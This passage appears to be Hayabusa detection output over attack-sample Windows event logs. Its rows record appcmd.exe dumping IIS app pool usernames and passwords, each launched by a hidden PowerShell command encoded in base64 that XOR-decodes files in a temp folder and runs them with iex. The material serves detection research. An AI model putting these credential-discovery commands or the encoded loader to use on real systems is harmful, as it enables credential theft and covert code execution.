ZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3240 | PGUID: 365ABB72-3D6D-5CEB-0000-0010D763FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.350 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3096 | PGUID: 365ABB72-3D6D-5CEB-0000-00109767FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.581 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2928 | PGUID: 365ABB72-3D6D-5CEB-0000-0010576BFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.661 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1340 | PGUID: 365ABB72-3D6D-5CEB-0000-00108270FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.731 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2448 | PGUID: 365ABB72-3D6D-5CEB-0000-00104474FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.811 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3444 | PGUID: 365ABB72-3D6D-5CEB-0000-00100478FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.891 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQA